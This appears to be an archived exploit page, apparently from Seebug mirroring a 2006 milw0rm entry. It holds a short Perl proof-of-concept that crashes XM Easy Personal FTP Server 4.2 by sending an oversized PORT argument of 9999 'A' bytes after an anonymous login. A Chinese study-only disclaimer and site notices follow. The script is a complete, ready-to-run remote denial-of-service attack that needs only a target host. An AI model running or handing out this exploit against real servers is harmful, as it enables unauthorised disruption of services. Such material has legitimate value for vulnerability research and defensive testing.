#!/usr/bin/perl # ---------------------------------------------------- # # Name : XM Easy Personal FTP Server # # Version : 4.2 # # ---------------------------------------------------- # # Type : dos / remote # # Descritpion : buffer overflow for huge PORT value # # ---------------------------------------------------- # # luka.research - id:28022006001 # # ---------------------------------------------------- # use Net::FTP; $host = @ARGV[0]; if ($host) { $ftp = Net::FTP->new($host, Debug => 0); $ftp->login("anonymous",'me@here.there'); $ftp->port("\x41"x9999); } else { print "\n- XM Easy Personal FTP Server 4.2 - PoC Exploit\n- Using: $0 host\n"; } # milw0rm.com [2006-03-04]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论